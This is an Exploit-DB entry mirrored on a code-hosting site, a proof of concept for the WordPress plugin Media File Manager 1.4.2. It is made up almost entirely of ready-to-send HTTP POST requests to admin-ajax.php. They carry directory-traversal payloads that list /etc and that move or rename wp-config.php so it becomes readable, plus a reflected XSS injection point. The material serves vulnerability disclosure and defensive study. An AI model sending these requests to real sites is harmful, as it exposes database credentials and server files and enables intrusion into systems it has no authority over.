bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/45809.txt
Offensive Security 3a6748b9d9 DB: 2018-11-13 
15 changes to exploits/shellcodes

HeidiSQL 9.5.0.5196 - Denial of Service (PoC)
CuteFTP 9.3.0.3 - Denial of Service (PoC)
Mongoose Web Server 6.9 - Denial of Service (PoC)
Data Center Audit 2.6.2 - 'username' SQL Injection
TufinOS 2.17 Build 1193 - XML External Entity Injection
Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal
Paroiciel 11.20 - 'tRecIdListe' SQL Injection
TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)
The Don 1.0.1 - 'login' SQL Injection
Facturation System 1.0 - 'modid' SQL Injection
Easyndexer 1.0 - Cross-Site Request Forgery (Add Admin)
GPS Tracking System 2.12 - 'username' SQL Injection
ServerZilla 1.0 - 'email' SQL Injection
D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery
Nominas 0.27 - 'username' SQL Injection
2018-11-13 05:01:42 +00:00

85 lines
No EOL
2.8 KiB
Text
Raw Blame History

# Exploit Title: Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal
# Date: 2018-05-11
# Exploit Author: Pasquale Turi (aka boombyte)
# Vendor Homepage: https://wordpress.org/plugins/media-file-manager/
# Software Link: https://wordpress.org/plugins/media-file-manager/
# Version: 1.4.2
# CVE: N/A
# Tested on: Ubuntu 18.10
# Plugin description:
# This plugin can be used for manage the uploaded file (we can rename files, see a preview,
# delete and move them to other folders under wordpress upload folder).
# This plugin can be used by administrator, author, contributor and subscriber.
# POC
# Diretory trasversal:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: REDATED
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Connection: close
Cookie: REDACTED
action=mrelocator_getdir&dir=../../../../../../../etc
# POC
# XSS Reflected
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: close
Cookie: REDACTED
action=mrelocator_getdir&dir=[XSS]
# POC
# Move any file to any dir:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Connection: close
Cookie: REDACTED
action=mrelocator_move&dir_from=../../&dir_to=../../../&items=wp-config.php
# POC
# Rename any file:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 97
Connection: close
Cookie: REDACTED
action=mrelocator_rename&dir=../../&from=wp-config.php&to=wp-config.txt
Reference in a new issue View git blame Copy permalink